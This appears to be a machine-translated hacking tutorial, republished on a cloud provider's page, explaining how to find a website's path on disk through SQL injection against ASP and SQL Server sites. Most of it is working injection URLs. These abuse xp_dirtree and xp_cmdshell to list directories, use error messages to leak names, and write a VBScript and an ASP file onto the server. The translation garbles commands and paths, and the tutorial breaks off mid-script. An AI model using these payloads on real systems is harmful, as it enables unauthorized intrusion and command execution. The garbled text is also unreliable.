Obtain the website path through SQL Injection

Source: Internet
Author: User

If the website only opens port 80, you will find that the following method is more useful.
The methods used are almost none I have found. I have some personal experience and skills in injection.
There are four methods (currently known)

Method 1:

This is the method described in <weird SQL Injection>
Take advantage of sqlserver's xp_dirtree. Okay, let's take a look at the method first, and then let's talk about its advantages and disadvantages (based on the original article)

Create a table

Statement: asp? Id = 1; create "> http://www.xxxxx.com/down/list.asp? Id = 1; create table dirs (paths varchar (1000 ))--
Return: normal information! The table is successfully created! Continue!
(This is a little bigger than the original one, because I deleted the id of a file with a long name, because it is useless)

Statement: http://www.xxxxx.com/down/list.asp? Id = 1; insert dirs exec master. dbo. xp_dirtree c :--
Return: normal information. It indicates that all the directories on drive C are successfully written! Great! The next step is to retrieve the table! Let it go. (It seems that this method is the only one)

Statement: http://www.xxxxx.com/down/list.asp? Id = 1 and 0 <> (select top 1 paths from dirs )-
Return: Microsoft ole db Provider for SQL Server Error 80040e07
A syntax error occurs when you convert varchar value @ Inetpub to a column whose data type is int.

The directory name in the table is displayed in sequence!

Statement: http: // http://www.xxxxx.com/down/list.asp? Id = 1 and 0 <> (select top 1 paths from
Dirs where paths not in (@ Inetpub ))--
Return: Microsoft ole db Provider for SQL Server Error 80040e07
A syntax error occurs when the varchar value test is converted to an int column.

The directory name in the table is displayed in sequence!
Okay. Let's continue.

Statement: http: // http://www.xxxxx.com/down/list.asp? Id = 1 and 0 <> (select top 1 paths from
Dirs where paths not in (@ Inetpub, test ))--
Return: Microsoft ole db Provider for SQL Server Error 80040e07
A syntax error occurs when the varchar value haha is converted to a column whose data type is int.

The directory name in the table is displayed in sequence!

Well, you should know how to do it. Haha, you just need to add the name of the obtained table to the brackets and put it in the brackets,

TIPS:

Sometimes you will find that when the input is similar

Http://www.xxxxx.com/down/list.asp? Id = 1 and 0 <> (select top 1 paths from dirs )-

The error is not displayed, but the webpage is displayed normally.
Dizzy. Don't be nervous.
Check if 0 <> (select top 1 paths from dirs) indicates that a number is returned,
Haha, test it to see what it is.

100> (select top 1 paths from dirs)

Return normal
Haha, you can quickly guess with this method greater than or less.
Okay. Let's continue.
For example

59 = (select top 1 paths from dirs)

Returns normal,
OK. The name is 59.
Enter the following
 
Http: // http://www.xxxxx.com/down/list.asp? Id = 1 and 0 <> (select top 1 paths from
Dirs where paths not in (59 ))--

Remember to enclose the quotation marks
The following method is the same as the original one.
Another problem is that
Sometimes when I input 59 using the above method, I find that the next folder is still 59.
How did this happen?
I wonder if you have noticed that 059 and 59 are the same?
That's why, haha,

Http: // http://www.xxxxx.com/down/list.asp? Id = 1 and 0 <> (select top 1 paths from
Dirs where paths not in (059 ))--

The name of the next folder is displayed. OK

Advantages and disadvantages:

The advantage is that all SQL Server users can use it, because the xp_dirtree permission is PUBLIC,
The disadvantage is that the names of all folders in the directory are displayed, and there seems to be no order of arrangement. In short, it is painful to find the desired folder in thousands or tens of thousands of folders.
And you know that there is a folder that cannot be guaranteed to be in the root directory. It is really a painful thing. It is often based on luck and endurance.
Wish you success

Method 2:

Use xp_cmdshell

Haha, you must be familiar with this. Let me just give it a brief introduction.

Create a table

Statement: http://www.xxxxx.com/down/list.asp? Id = 1; create table dirs (paths varchar (1000 ))--
Return: normal information! The table is successfully created! Continue!
(This is a little bigger than the original one, because I deleted the id of a file with a long name, because it is useless.

Statement: http://www.xxxxx.com/down/list.asp? Id = 1; insert dirs exec master. dbo. xp_mongoshell dir c:/B/D --
Return: normal information. It indicates that all the directories on drive C are successfully written! Dir c:/B/D is used here. Haha. If you do not know the function of/B/D, test it.

Statement: http://www.xxxxx.com/down/list.asp? Id = 1 and 0 <> (select top 1 paths from dirs )-
Return: Microsoft ole db Provider for SQL Server Error 80040e07
A syntax error occurs when you convert varchar value @ Inetpub to a column whose data type is int.

The directory name in the table is displayed in sequence!

Statement: http: // http://www.xxxxx.com/down/list.asp? Id = 1 and 0 <> (select top 1 paths from
Dirs where paths not in (@ Inetpub ))--
Return: Microsoft ole db Provider for SQL Server Error 80040e07
A syntax error occurs when the varchar value test is converted to an int column.

The directory name in the table is displayed in sequence!

The method is the same as above.

Sometimes we can also use the following two extensions to do something.

1) We can use xp_availablemedia to obtain all the current drives and store them in the dirs table:

5; insert dirs exec master. dbo. xp_availablemedia ;--

We can query the temp content to obtain the drive list and related information.

(2) We can use xp_subdirs to obtain the list of sub-directories and store them in the dirs table:

5; insert into dirs exec master. dbo. xp_subdirs c :;--

Advantages and disadvantages:

Obviously, all the directories in xp_dirtree will not be put together. Only the first-level directories will be displayed, which is much easier to find.
The disadvantage is also obvious. Only sa has this permission, or the administrator may have deleted this extension (after all, it is too powerful ).

Method 3:

This method is good.
Below is the original text
I thought of using the adsutil. vbs program.

A; exec master .. xp_mongoshell cmd/c cscript c: inetpubadminscripsadsutil. vbs enum w3svc/1/root> a.txt ;--

Is it too long? through this, we can set the first virtual web site in iis (including the actual directory where it is located)
Import to a.txt
The actual location of a.txt is c: winntsystem32 by default. In fact, this is not a problem, but the Administrator has encountered adsutil. vbs
Deleted or put it to another location
We can't do anything about it (it's impossible to write one by using the echo command)

Step 2: Use the echo command to write the following code into c:. Isn't it a lot?

... Xp_cmdshell echo set fso1 = createobject ("scripting. filesystemobject")> c: ead. vbs ;--
... Xp_cmdshell echo Set WshShell = Wscript. createObject ("Wscript. Shell")> c: ead. vbs
;--
.....
----------------- Read. vbs ---------------------------------
Set fso1 = createobject ("scripting. filesystemobject ")
Set WshShell = Wscript. createObject ("Wscript. Shell ")
Spa = WshShell. Environment ("process") ("windir ")
Set fil = fso1.opentextfile (spa & "system32aa.txt ")
Do while not fil. atendofstream
Nr = fil. readline
If left (nr, 4) = "Path" then
Pa = mid (nr, instr (nr, ")") 3, len (nr)-instr (nr, ")")-3)
Exit do
End if
Loop
Set fil1 = fso1.opentextfile (pa & "dd. asp", 2, true)
Fil1.writeline ""
--------------- Cut here -------------------------------------

Step 3: Of course, prepare to execute read.vbs. In this case, we can read the content in aa.txt to find the actual path of the web site.
Then, write a file named dd. asp in the root directory of the web site. If it succeeds, you will know.
Run http://x.x.x.x/dd.asp
Return: xxx
Haha, it is indeed a good method,
However, the original document seems to be a problem.
Yes

Set fil = fso1.opentextfile (spa % 2B "system32aa.txt ")
Set fil1 = fso1.opentextfile (pa % 2B "dd. asp", 2, true)

An error occurs when two statements are submitted.
So we thought of the plus sign, which has the same function &.
What else can I write to dd. asp? Write pa, haha
Haha, changed

----------------- Read. vbs ---------------------------------
Set fso1 = createobject ("scripting. filesystemobject ")
Set WshShell = Wscript. createObject ("Wscript. Shell ")
Spa = WshShell. Environment ("process") ("windir ")

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.